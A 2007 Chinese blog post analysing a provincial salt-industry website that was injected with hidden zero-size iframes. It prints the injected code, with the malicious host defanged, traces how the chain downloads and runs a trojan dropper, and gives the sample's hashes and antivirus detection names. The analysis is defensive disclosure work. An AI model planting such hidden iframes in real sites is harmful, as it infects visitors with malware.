紫郢剑侠
紫郢剑侠

某省盐业网被植入传播Trojan.DL.Win32.Agent.zrc的代码

某省盐业网被植入传播Trojan.DL.Win32.Agent.zrc的代码

endurer 原创
2007-10-29 第1

该网站首页的首部和尾部被加入代码:
/---
<iframe src=hxxp://h*ot**peak.host**.2*w**cn.com/wm/index.htm width=0 height=0></iframe>
---/

hxxp://h*ot**peak.host**.2*w**cn.com/wm/index.htm 的检查cookies变量HeiYeNo2,若不存在则创建,并输出代码:
/---
<iframe width=0 height=0 src=tcsafe.htm></iframe>
<iframe src=hxxp://h*ot**peak.host**.2*w**cn.com/wm/tcsafe.htm width=0 height=0></iframe>
---/

tcsafe.htm 下载 xxz.exe,保存为 tcsafe.com 并运行。


文件说明符 : d:/test/xxz.exe
属性 : A---
语言 : 中文(中国)
文件版本 : 6.00.2900.2180 (xpsp_sp2_rtm.040803-2158)
说明 : Win32 Cabinet Self-Extractor                                          
版权 : (C) Microsoft Corporation. All rights reserved.
备注 :
产品版本 : 6.00.2900.2180
产品名称 : Microsoft(R) Windows(R) Operating System
公司名称 : Microsoft Corporation
合法商标 :
内部名称 : Wextract               
源文件名 : WEXTRACT.EXE           
创建时间 : 2007-10-26 12:17:32
修改时间 : 2007-10-26 12:17:36
访问时间 : 2007-10-26 12:22:53
大小 : 386560 字节 377.512 KB
MD5 : 452ec2b7ec2f9823a37874e90c55319d
SHA1: 87ABA7445FED3CD5CE2A4DF7CC705902A50B3A8A
CRC32: 07ca93ce


瑞星报为:Trojan.DL.Win32.Agent.zrc>>aspr.ske.2.x.new>>3.exe>>pe_patch(14)>>pe_patch(14)

 

主 题: RE: xxz.exe [KLAB-3175811]
  发件人: ""    发送时间:2007-10-26 13:31:08
Hello.
Trojan-Dropper.Win32.Agent.ceb
New malicious software was found in the attached file.
It's detection will be included in the next update. Thank you for your help.
-----------------
Regards, Yury Nesmachny
Virus Analyst, Kaspersky Lab.

你可能感兴趣的:(系统安全)

  • 电气接点在线测温解决方案 安科瑞 华楠 能源
    安科瑞华楠187+0616+3979测温方案在由众多发电、输电、变电、配电及用电设备连接而成的电力系统中,为避免因温度过高,导致设备老化,设备烧坏,供电中断,一次设备起火爆炸等严重事故。因此,对各电气节点进行长期的温度监测能避免因严重故障而造成用户的人身伤害及经济损失。为此,我司为客户提供一套完善的温度监测方案。在高、低压电力系统中对各电气节点的温度进行准确地监测,确保电力系统安全、稳定、可靠地运
  • 网络数据库安全和数据安全概述 网络安全(华哥) 计算机网络安全网络工程师网络web安全安全
    1、数据安全的三要素完整性,机密性,可用性2、安全技术和措施数据完整性技术、数据备份和恢复技术、数据加密技术、访问控制技术、用户管理和身份验证技术3、数据库安全数据库安全是指数据库的任何部分都不允许受到侵害,或未经授权的存取和修改。数据库系统安全:硬件运行安全、物理控制安全、操作系统安全、用户有可连接数据库的授权、灾害故障恢复数据库数据安全:有效的用户名/口令鉴别、用户访问权限控制、数据存取权限、
  • AI时代下的安全堡垒:零信任模式如何守护你的AI系统 haomo2014 人工智能信息可视化前端
    在人工智能(AI)飞速发展的今天,越来越多的企业和个人开始依赖AI写代码工具等AI技术来提升效率和创造力。然而,AI系统也面临着前所未有的安全挑战。传统的安全模式已经难以应对AI系统的数据敏感性、模型漏洞以及分布式架构带来的风险。因此,零信任安全模式应运而生,成为守护AI系统安全的新型堡垒。……AI系统的安全挑战:传统安全模式的局限性AI系统与传统的应用程序相比,具有独特的安全挑战:数据敏感性:A
  • 【操作系统】安全 Guiat 操作系统操作系统
    上期回顾:【操作系统】Linux操作系统个人主页:GUIQU.归属专栏:操作系统目录1.操作系统安全概述1.1操作系统安全的重要性1.2操作系统安全威胁的类型1.2.1恶意软件1.2.2系统漏洞1.2.3网络攻击2.操作系统安全机制2.1用户认证与授权2.1.1用户认证2.1.2用户授权2.2内存保护2.3数据加密2.4安全审计与监控3.操作系统安全增强策略3.1安全更新与补丁管理3.2安全配置管
  • 网络安全概论 网络安全(华哥) 计算机网络安全网络工程师web安全安全网络
    网络安全概论--网络基础知识--防火墙技术--身份识别技术--虚拟专用网络--入侵检测技术--病毒和恶意代码--业务连续性计划--安全管理--信息系统安全方案设计方法一、网络安全面临的威胁物理安全威胁、操作系统的安全缺陷、网络协议的安全缺陷、应用软件的实现缺陷、用户使用的缺陷和恶意程序等6个方面的安全威胁。二、物理安全问题的重要性信息安全首先要保障信息的物理安全。物理安全是指在物理介质层次上对存储
  • 零基础转行学网络安全怎么样?能找到什么样的工作? 程序员霸哥 网络安全程序员编程web安全安全网络php服务器pythonjava
    网络安全对于现代社会来说变得越来越重要,但是很多人对于网络安全的知识却知之甚少。那么,零基础小白可以学网络安全吗?答案是肯定的。零基础转行学习网络安全是完全可行的,但需要明确的是,网络安全是一个既广泛又深入的领域,包含了网络协议、系统安全、应用安全、密码学、渗透测试、漏洞挖掘、安全编程、安全运维等多个方面。。网络安全是一个快速发展的领域,对专业人才的需求不断增长。以下是一些关于零基础转行学习网络安
  • 2025零基础入门学网络安全(详细),看这篇就够了 程序员霸哥 程序员网络安全编程web安全安全网络php服务器pythonjava
    目录1.什么是网络安全1.1网络安全的定义:1.2信息系统(InformationSystem)1.3信息系统安全三要素(CIA)1.4网络空间安全1.5国家网络空间安全战略1.6网络空间关注点1.7网络空间安全管理流程2.网络安全术语3.网络安全学习路线3.1安全基础:3.2渗透技术:3.2.1配置渗透环境:3.2.2渗透实战操作:3.3进阶学习:编辑4.网络安全学习资源:网络安全教程视频:编辑
  • 硬盘接入电脑提示格式化是什么原因 上海赛亿数据恢复 存储数据恢复硬盘数据恢复运维
    硬盘接入电脑后提示格式化,可能由多种原因造成。以下是一些常见的原因及简要说明:文件系统损坏:当硬盘的文件系统(如NTFS、FAT32等)发生损坏时,操作系统可能无法正确识别硬盘,从而提示需要格式化。文件系统损坏可能由多种因素引起,如不当的插拔操作、突然断电、硬盘老化等。病毒感染:某些恶意软件或病毒可能会破坏存储在硬盘上的数据或文件系统,导致系统认为硬盘需要格式化。为了系统安全,操作系统可能会弹出格
  • 生产环境超实用Shell脚本三 运维服务器linux
    生产环境超实用Shell脚本三Shell脚本作为自动化运维的利器,在生产环境中扮演着至关重要的角色。本文将介绍安全加固脚本、数据同步脚本、数据库备份脚本、网站监控脚本、日志分析脚本等的应用场景,并提供相应的示例代码。1.安全加固脚本功能:加强系统安全配置,例如禁用root登录、修改SSH端口、配置防火墙等。应用场景:提高系统安全性,防止恶意攻击。示例代码:#!/bin/bash#禁用root登录s
  • Blazor开发中注册功能设计研究 码农君莫笑 前端htmlvisualstudio服务器microsoft.netcore
    Blazor开发中注册功能设计是为了用户可以高效、安全地完成注册并登录系统。以高效和用户友好为目标,结合校验、注册和登录功能,为用户提供一个完整的账户管理流程,同时保障系统安全性和稳定性。注册页面应该结构清晰、布局合理,既满足基本注册功能,又通过响应式设计与视觉优化增强用户体验,支持与Blazor后端的无缝交互。其特性与目标如下:安全性:通过密码校验、注册口令检查和用户权限控制,确保注册和登录过程
  • 网络安全知识点 黑客Ash php开发语言
    1.2.1网络安全概念P4网络安全是指网络系统的硬件、软件及其系统中的数据受到保护,不因偶然的或恶意的原因而遭到破坏、更改、泄露,系统连续可靠正常地运行,网络服务不中断。1.2.3网络安全的种类P5(1)物理安全(2)系统安全(3)电子商务(4)协议安全(5)应用系统安全1.3.5网络攻击分类P11(1)主动攻击:包含攻击者访问他所需信息的故意行为。(2)被动攻击:主要是收集信息而不是进行访问,数
  • 网络安全学习路线图(2025版详解) 程序员羊羊 web安全学习安全运维密码学
    近期,大家在网上对于网络安全讨论比较多,想要学习的人也不少,但是需要学习哪些内容,按照什么顺序去学习呢?其实我们已经出国多版本的网络安全学习路线图,一直以来效果也比较不错,本次我们针对市场需求,整理了一套系统的网络安全学习路线图,供大家学习参考。希望大家按照路线图进行系统学习不仅可以更高效的完成上岸,还能够系统化学习,提升自己的后期竞争力。第一阶段:数通安全Windows系统安全1.企业资产安全规
  • 银河麒麟系统V10(arm版)离线安装docker说明 爱T小毛驴 docker容器运维
    #银河麒麟系统docker环境#随着2024年微软全球蓝屏事件的出现,系统安全越来越重要。目前很多企业开始尝试国产化操作系统上,但是很多软件依赖和环境总是会出现各种问题,比如安装了a软件,发现却b依赖,安装了b依赖又缺其他依赖。本文介绍如何在国产化银河麒麟系统V10(arm)版上安装docker。Docker是一组平台即服务(PaaS)的产品。它基于操作系统层级的虚拟化技术,将软件与其依赖项打包为
  • [系统安全] 六十一.恶意软件分析 (12)LLM赋能Lark工具提取XLM代码的抽象语法树(初探) Eastmount 系统安全与恶意代码分析系统安全抽象语法树Lark大模型XLM
    您可能之前看到过我写的类似文章,为什么还要重复撰写呢?只是想更好地帮助初学者了解病毒逆向分析和系统安全,更加成体系且不破坏之前的系列。因此,我重新开设了这个专栏,准备系统整理和深入学习系统安全、逆向分析和恶意代码检测,“系统安全”系列文章会更加聚焦,更加系统,更加深入,也是作者的慢慢成长史。换专业确实挺难的,逆向分析也是块硬骨头,但我也试试,看看自己未来四年究竟能将它学到什么程度,漫漫长征路,偏向
  • MySQL数据库安全 关了个尔 mysql数据库网络安全web安全
    文章目录前言一、MySQL二、数据库安全1.基础概念2.数据库安全目标3.数据库安全防护技术4.影响数据库安全的因素三、数据库系统安全相关因素1、外围网络2、主机3、数据库4、代码补充:sql注入四、保障MySQL安全的方法总结前言无论是对于企业还是个人,数据库中所保存数据的安全性是尤其重要的。尤其是对于公司企业等来讲,其商业数据往往带有着巨大的价值。本文对MySQL数据库安全做了一些介绍。一、M
  • Linux--权限 kyle~ Linuxlinux运维服务器
    Linux系统的权限管理是保障系统安全的重要机制,以下详细讲解权限相关概念及操作指令:一、基础权限机制1.权限的三元组,读(r)、写(w)、执行(x)每个文件或目录有三组权限,分别对应三类用户:所有者(User):文件/目录的创建者或当前所有者。所属组(Group):文件/目录所属的用户组。其他用户(Others):非所有者且不属于所属组的用户。每组权限由三个字符组成:r(读)、w(写)、x(执行
  • 计算机网络 (54)系统安全:防火墙与入侵检测 IT 青年 一研为定计算机网络
    前言计算机网络系统安全是确保网络通信和数据不受未经授权访问、泄露、破坏或篡改的关键。防火墙和入侵检测系统(IDS)是维护网络系统安全的两大核心组件。一、防火墙定义与功能防火墙是一种用来加强网络之间访问控制的特殊网络互联设备,它可以是硬件、软件或软硬件的组合。防火墙的主要功能是根据各种网络安全策略的要求,对未经授权的访问和数据传递进行筛选和屏蔽,以保护内部网络数据的安全。类型网络层防火墙:保护整个网
  • 浏览器安全沙箱 weixin_43605299 jsjavascript安全
    一、概要:浏览器安全可以分为三大块—Web页面安全、浏览器网络安全、浏览器系统安全二、从安全的角度看待,为什么浏览器要从单进程发展?对于单进程应用,即整个浏览器只有一个进程。当浏览器出现一些重要的漏洞时,黑客可以直接攻击操作系统,获取操作系统中的用户信息。这毫无疑问是“核弹”级别的漏洞。对于多进程架构的浏览器。即使出现漏洞,那么黑客也只能攻击到渲染进程。而浏览器内核还是安全的。三、浏览器安全沙箱:
  • 全面解析物联网信息安全知识体系 无声远望
    本文还有配套的精品资源,点击获取简介:本资料集详细介绍物联网信息安全的多个重要方面,包括基础概念、数学基础、数据安全与隐私保护、集成安全技术、安全分析、防护策略和身份认证。从基本的物联网安全概念到深度探讨密码学基础,再到数据保护技术,再到全面的系统安全设计,安全分析,防御措施以及身份验证技术,这些内容将为研究者、开发者和管理者提供物联网安全的全面视角。1.物联网信息安全基础概念在现代技术不断发展的
  • 系统安全架构之车辆网络安全架构 小正太浩二 安全架构web安全架构
    一、简介随着汽车的智能化和互联化,车辆网络安全架构的重要性日益凸显。现代汽车越来越依赖于计算机和网络技术,车载电子设备数量增加,不同设备之间的互联性增强,这使得车辆网络系统容易受到网络攻击。对于汽车而言,安全问题已经不再只是关乎车辆本身的问题,而是涉及到了乘客的安全和隐私,甚至是道路安全和整个社会的安全。因此,确保车辆网络的安全性和可靠性已成为了汽车安全的重要组成部分。二、车辆网络安全的威胁和挑战
  • [RHEL7基础篇-4] 用户和权限 JoveZou #RHEL7基础篇RedHatEnterpriseLinuxlinuxrhel
    [RHEL7基础篇-4]用户和权限简介用户和权限用户和组权限简介在RHEL7当中控制用户权限有DAC和ACL两种方式来控制文件或目录对于相应用户或组的权限,有的时候管理员为了系统安全往往会把root用户给藏起来,不给ssh远程登录,那时我们将使用到sudo来临时获得root用户的权限,或者通过su来切换到拥有权限的用户进行操作,该篇将会讲述用户和权限的相关配置与使用,以及如何临时获得root权限与
  • GBase 8s数据库替换Oracle方案简介 wangzhejijie 国产数据库数据库架构数据仓库数据库
    采用GBase8s安全数据库替换Oracle应用数据库,其优势如下:系统兼容性得到全面提升。GBase8s安全数据库作为国产自主可控产品,全面兼容国产化软硬件环境。系统安全性得到提升。首先GBase8s是一款安全数据库,其安全等级高于Oracle数据库;其次GBase8s作为通用关系型数据库,可对应用系统提供更好的查询和分析支持。重新统一规划,综合考虑未来业务因素的数据量增长及服务器性能,预估未来
  • ATF(ARM Trusted firmware)完成启动流程 cpj123cpj linuxkernelatf
    历经一年多时间的系统整理合补充,《手机安全和可信应用开发指南:TrustZone与OP-TEE技术详解》一书得以出版,书中详细介绍了TEE以及系统安全中的所有内容,全书按照从硬件到软件,从用户空间到内核空间的顺序对TEE技术详细阐述,读者可从用户空间到TEE内核一步一步了解系统安全的所有内容,同时书中也提供了相关的示例代码,读者可根据自身实际需求开发TA。目前该书已在天猫、京东、当当同步上线,链接
  • 软考信安19~操作系统安全保护 jnprlxc 软考~信息安全工程师安全网络学习方法笔记运维
    1、操作系统安全概述1.1、操作系统安全概念操作系统的安全是指满足安全策略要求,具有相应的安全机制及安全功能,符合特定的安全标准,在一定约束条件下,能够抵御常见的网络安全威胁,保障自身的安全运行及资源安全。《信息安全技术操作系统安全技术要求(GB/T20272—2019)》将操作系统分成五个安全等级,即用户自主保护级、系统审计保护级、安全标记保护级、结构化保护级、访间验证保护级。操作系统的安全可控
  • 02~信息安全标准与规范 jnprlxc 安全学习方法网络安全系统安全安全架构改行学it职场和发展
    一、常见的信息安全标准1、美国标准:TCSEC(TrustedComputerSystemEvaluationCriteria,可信计算机系统评价标准。)1970年由美国国防科学委员会提出,1985年12月由美国国防部公布。是计算机系统安全评估的第一个正式标准。TCSEC最初只是军用标准,后来延至民用领域。将计算机系统的安全划分为4个等级、7个级别。四个大类(由低到高):D(最小保护)、C(自主保
  • 使用 Rebuff 检测和防御 Prompt Injection 攻击 azzxcvhj promptpython
    技术背景介绍随着生成式AI的逐渐普及,PromptInjection(PI)攻击逐渐成为一种严重的安全威胁。这种攻击方式利用模型对输入过度信赖的特性,精心设计输入内容,以误导AI系统执行不当的操作。例如,攻击者可以注入恶意SQL语句或绕过原有的逻辑规则,给系统安全带来极大隐患。本文将重点介绍开源工具Rebuff,它是一种自硬化的PromptInjection检测系统,旨在通过多层次防御机制保护AI
  • Spring Security 入门 后端java
    SpringSecurity是Spring框架中一个功能强大且灵活的安全模块。它为应用程序提供了强大的认证和授权功能,同时支持防止常见的安全攻击(如CSRF和会话固定攻击)。在开发Web应用程序时,理解和配置SpringSecurity是保障系统安全的关键。一、SpringSecurity的核心概念认证(Authentication)认证是指验证用户的身份,即确认用户是谁。SpringSecuri
  • 云计算相关 xianKOG 云计算云计算
    文章目录一、虚拟化1、虚拟化技术概述特点2、虚拟化与云化3、计算虚拟化分类与作用常见的计算服务架构4、存储虚拟化5、网络虚拟化二、行业管理规章制度1、服务器管理制度访问控制变更管理备份与恢复监控与审计2、操作系统安全管理规范更新与补丁管理用户账号管理防火墙与安全软件日志管理3、虚拟化管理规定资源分配隔离策略模版与镜像三、操作系统1、操作系统安装2、操作系统调优3、操作系统管理维护4、常见服务安装与
  • XML外部实体注入--漏洞利用 索然无味io 网络安全xml前端网络安全php笔记学习web安全
    一.基本概念1.XXE漏洞原理介绍:XXE漏洞在应用程序解析XML输入时触发,若未限制外部实体加载,攻击者便能掌控外部加载文件,进而引发漏洞。其常见于可上传xml文件之处,如上传点未对xml文件过滤,恶意xml文件就可上传。2.漏洞危害文件读取:能读取服务器任意文件,如利用]>&xxe;可获取敏感信息。命令执行:在特定条件下,可执行系统命令,危害系统安全。内网探测与攻击:探测内网端口、攻击内网网站
  • 局域网IP扫描工具:原理、应用与实战 邹晓航0号
    本文还有配套的精品资源,点击获取简介:局域网IP扫描工具是网络管理的重要工具,可以帮助用户扫描并列出同一网络段内的所有活动设备的IP地址。本文将深入探讨该工具的工作原理、功能特点以及应用场景,包括快速准确地识别网络设备、故障排查、系统安全检查以及网络优化。此外,本文还将介绍一款开源的免费IP扫描工具——FreeIPScan,并总结如何通过正确使用这些工具来提高网络安全性、优化网络资源并及时发现和解
  • 算法 单链的创建与删除 换个号韩国红果果 c算法
    先创建结构体 struct student { int data; //int tag;//标记这是第几个 struct student *next; }; // addone 用于将一个数插入已从小到大排好序的链中 struct student *addone(struct student *h,int x){ if(h==NULL) //??????
  • 《大型网站系统与Java中间件实践》第2章读后感 白糖_ java中间件
           断断续续花了两天时间试读了《大型网站系统与Java中间件实践》的第2章,这章总述了从一个小型单机构建的网站发展到大型网站的演化过程---整个过程会遇到很多困难,但每一个屏障都会有解决方案,最终就是依靠这些个解决方案汇聚到一起组成了一个健壮稳定高效的大型系统。          看完整章内容,
  • zeus持久层spring事务单元测试 deng520159 javaDAOspringjdbc
    今天把zeus事务单元测试放出来,让大家指出他的毛病, 1.ZeusTransactionTest.java 单元测试   package com.dengliang.zeus.webdemo.test; import java.util.ArrayList; import java.util.List; import org.junit.Test; import
  • Rss 订阅 开发 周凡杨 htmlxml订阅rss规范
                    RSS是 Really Simple Syndication的缩写(对rss2.0而言,是这三个词的缩写,对rss1.0而言则是RDF Site Summary的缩写,1.0与2.0走的是两个体系)。   RSS
  • 分页查询实现 g21121 分页查询
    在查询列表时我们常常会用到分页,分页的好处就是减少数据交换,每次查询一定数量减少数据库压力等等。 按实现形式分前台分页和服务器分页: 前台分页就是一次查询出所有记录,在页面中用js进行虚拟分页,这种形式在数据量较小时优势比较明显,一次加载就不必再访问服务器了,但当数据量较大时会对页面造成压力,传输速度也会大幅下降。 服务器分页就是每次请求相同数量记录,按一定规则排序,每次取一定序号直接的数据
  • spring jms异步消息处理 510888780 jms
    spring JMS对于异步消息处理基本上只需配置下就能进行高效的处理。其核心就是消息侦听器容器,常用的类就是DefaultMessageListenerContainer。该容器可配置侦听器的并发数量,以及配合MessageListenerAdapter使用消息驱动POJO进行消息处理。且消息驱动POJO是放入TaskExecutor中进行处理,进一步提高性能,减少侦听器的阻塞。具体配置如下:
  • highCharts柱状图 布衣凌宇 hightCharts柱图
    第一步:导入 exporting.js,grid.js,highcharts.js;第二步:写controller   @Controller@RequestMapping(value="${adminPath}/statistick")public class StatistickController {  private UserServi
  • 我的spring学习笔记2-IoC(反向控制 依赖注入) aijuans springmvcSpring 教程spring3 教程Spring 入门
    IoC(反向控制 依赖注入)这是Spring提出来了,这也是Spring一大特色。这里我不用多说,我们看Spring教程就可以了解。当然我们不用Spring也可以用IoC,下面我将介绍不用Spring的IoC。 IoC不是框架,她是java的技术,如今大多数轻量级的容器都会用到IoC技术。这里我就用一个例子来说明: 如:程序中有 Mysql.calss 、Oracle.class 、SqlSe
  • TLS java简单实现 antlove javasslkeystoretlssecure
      1. SSLServer.java package ssl; import java.io.FileInputStream; import java.io.InputStream; import java.net.ServerSocket; import java.net.Socket; import java.security.KeyStore; import
  • Zip解压压缩文件 百合不是茶 Zip格式解压Zip流的使用文件解压
       ZIP文件的解压缩实质上就是从输入流中读取数据。Java.util.zip包提供了类ZipInputStream来读取ZIP文件,下面的代码段创建了一个输入流来读取ZIP格式的文件; ZipInputStream in = new ZipInputStream(new FileInputStream(zipFileName));     &n
  • underscore.js 学习(一) bijian1013 JavaScriptunderscore
            工作中需要用到underscore.js,发现这是一个包括了很多基本功能函数的js库,里面有很多实用的函数。而且它没有扩展 javascript的原生对象。主要涉及对Collection、Object、Array、Function的操作。       学
  • java jvm常用命令工具——jstatd命令(Java Statistics Monitoring Daemon) bijian1013 javajvmjstatd
    1.介绍         jstatd是一个基于RMI(Remove Method Invocation)的服务程序,它用于监控基于HotSpot的JVM中资源的创建及销毁,并且提供了一个远程接口允许远程的监控工具连接到本地的JVM执行命令。         jstatd是基于RMI的,所以在运行jstatd的服务
  • 【Spring框架三】Spring常用注解之Transactional bit1129 transactional
    Spring可以通过注解@Transactional来为业务逻辑层的方法(调用DAO完成持久化动作)添加事务能力,如下是@Transactional注解的定义:   /* * Copyright 2002-2010 the original author or authors. * * Licensed under the Apache License, Version
  • 我(程序员)的前进方向 bitray 程序员
    作为一个普通的程序员,我一直游走在java语言中,java也确实让我有了很多的体会.不过随着学习的深入,java语言的新技术产生的越来越多,从最初期的javase,我逐渐开始转变到ssh,ssi,这种主流的码农,.过了几天为了解决新问题,webservice的大旗也被我祭出来了,又过了些日子jms架构的activemq也开始必须学习了.再后来开始了一系列技术学习,osgi,restful.....
  • nginx lua开发经验总结 ronin47
    使用nginx lua已经两三个月了,项目接开发完毕了,这几天准备上线并且跟高德地图对接。回顾下来lua在项目中占得必中还是比较大的,跟PHP的占比差不多持平了,因此在开发中遇到一些问题备忘一下 1:content_by_lua中代码容量有限制,一般不要写太多代码,正常编写代码一般在100行左右(具体容量没有细心测哈哈,在4kb左右),如果超出了则重启nginx的时候会报 too long pa
  • java-66-用递归颠倒一个栈。例如输入栈{1,2,3,4,5},1在栈顶。颠倒之后的栈为{5,4,3,2,1},5处在栈顶 bylijinnan java
    import java.util.Stack; public class ReverseStackRecursive { /** * Q 66.颠倒栈。 * 题目:用递归颠倒一个栈。例如输入栈{1,2,3,4,5},1在栈顶。 * 颠倒之后的栈为{5,4,3,2,1},5处在栈顶。 *1. Pop the top element *2. Revers
  • 正确理解Linux内存占用过高的问题 cfyme linux
    Linux开机后,使用top命令查看,4G物理内存发现已使用的多大3.2G,占用率高达80%以上: Mem:   3889836k total,  3341868k used,   547968k free,   286044k buffers Swap:  6127608k total,&nb
  • [JWFD开源工作流]当前流程引擎设计的一个急需解决的问题 comsci 工作流
         当我们的流程引擎进入IRC阶段的时候,当循环反馈模型出现之后,每次循环都会导致一大堆节点内存数据残留在系统内存中,循环的次数越多,这些残留数据将导致系统内存溢出,并使得引擎崩溃。。。。。。       而解决办法就是利用汇编语言或者其它系统编程语言,在引擎运行时,把这些残留数据清除掉。
  • 自定义类的equals函数 dai_lm equals
    仅作笔记使用 public class VectorQueue { private final Vector<VectorItem> queue; private class VectorItem { private final Object item; private final int quantity; public VectorI
  • Linux下安装R语言 datageek R语言 linux
    命令如下:sudo gedit  /etc/apt/sources.list1、deb http://mirrors.ustc.edu.cn/CRAN/bin/linux/ubuntu/ precise/ 2、deb http://dk.archive.ubuntu.com/ubuntu hardy universesudo apt-key adv --keyserver ke
  • 如何修改mysql 并发数(连接数)最大值 dcj3sjt126com mysql
    MySQL的连接数最大值跟MySQL没关系,主要看系统和业务逻辑了   方法一:进入MYSQL安装目录 打开MYSQL配置文件 my.ini 或 my.cnf查找 max_connections=100 修改为 max_connections=1000 服务里重起MYSQL即可   方法二:MySQL的最大连接数默认是100客户端登录:mysql -uusername -ppass
  • 单一功能原则 dcj3sjt126com 面向对象的程序设计软件设计编程原则
    单一功能原则[ 编辑]     SOLID 原则 单一功能原则 开闭原则 Liskov代换原则 接口隔离原则 依赖反转原则 查   论   编 在面向对象编程领域中,单一功能原则(Single responsibility principle)规定每个类都应该有
  • POJO、VO和JavaBean区别和联系 fanmingxing VOPOJOjavabean
    POJO和JavaBean是我们常见的两个关键字,一般容易混淆,POJO全称是Plain Ordinary Java Object / Plain Old Java Object,中文可以翻译成:普通Java类,具有一部分getter/setter方法的那种类就可以称作POJO,但是JavaBean则比POJO复杂很多,JavaBean是一种组件技术,就好像你做了一个扳子,而这个扳子会在很多地方被
  • SpringSecurity3.X--LDAP:AD配置 hanqunfeng SpringSecurity
    前面介绍过基于本地数据库验证的方式,参考http://hanqunfeng.iteye.com/blog/1155226,这里说一下如何修改为使用AD进行身份验证【只对用户名和密码进行验证,权限依旧存储在本地数据库中】。   将配置文件中的如下部分删除: <!-- 认证管理器,使用自定义的UserDetailsService,并对密码采用md5加密-->
  • mac mysql 修改密码 IXHONG mysql
    $ sudo /usr/local/mysql/bin/mysqld_safe –user=root & //启动MySQL(也可以通过偏好设置面板来启动)$ sudo /usr/local/mysql/bin/mysqladmin -uroot password yourpassword //设置MySQL密码(注意,这是第一次MySQL密码为空的时候的设置命令,如果是修改密码,还需在-
  • 设计模式--抽象工厂模式 kerryg 设计模式
    抽象工厂模式:     工厂模式有一个问题就是,类的创建依赖于工厂类,也就是说,如果想要拓展程序,必须对工厂类进行修改,这违背了闭包原则。我们采用抽象工厂模式,创建多个工厂类,这样一旦需要增加新的功能,直接增加新的工厂类就可以了,不需要修改之前的代码。     总结:这个模式的好处就是,如果想增加一个功能,就需要做一个实现类,
  • 评"高中女生军训期跳楼” nannan408
       首先,先抛出我的观点,各位看官少点砖头。那就是,中国的差异化教育必须做起来。    孔圣人有云:有教无类。不同类型的人,都应该有对应的教育方法。目前中国的一体化教育,不知道已经扼杀了多少创造性人才。我们出不了爱迪生,出不了爱因斯坦,很大原因,是我们的培养思路错了,我们是第一要“顺从”。如果不顺从,我们的学校,就会用各种方法,罚站,罚写作业,各种罚。军
  • scala如何读取和写入文件内容? qindongliang1922 javajvmscala
    直接看如下代码: package file import java.io.RandomAccessFile import java.nio.charset.Charset import scala.io.Source import scala.reflect.io.{File, Path} /** * Created by qindongliang on 2015/
  • C语言算法之百元买百鸡 qiufeihu c算法
    中国古代数学家张丘建在他的《算经》中提出了一个著名的“百钱买百鸡问题”,鸡翁一,值钱五,鸡母一,值钱三,鸡雏三,值钱一,百钱买百鸡,问翁,母,雏各几何? 代码如下: #include <stdio.h> int main() { int cock,hen,chick; /*定义变量为基本整型*/ for(coc
  • Hadoop集群安全性:Hadoop中Namenode单点故障的解决方案及详细介绍AvatarNode wyz2009107220 NameNode
    正如大家所知,NameNode在Hadoop系统中存在单点故障问题,这个对于标榜高可用性的Hadoop来说一直是个软肋。本文讨论一下为了解决这个问题而存在的几个solution。 1. Secondary NameNode 原理:Secondary NN会定期的从NN中读取editlog,与自己存储的Image进行合并形成新的metadata image 优点:Hadoop较早的版本都自带,
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他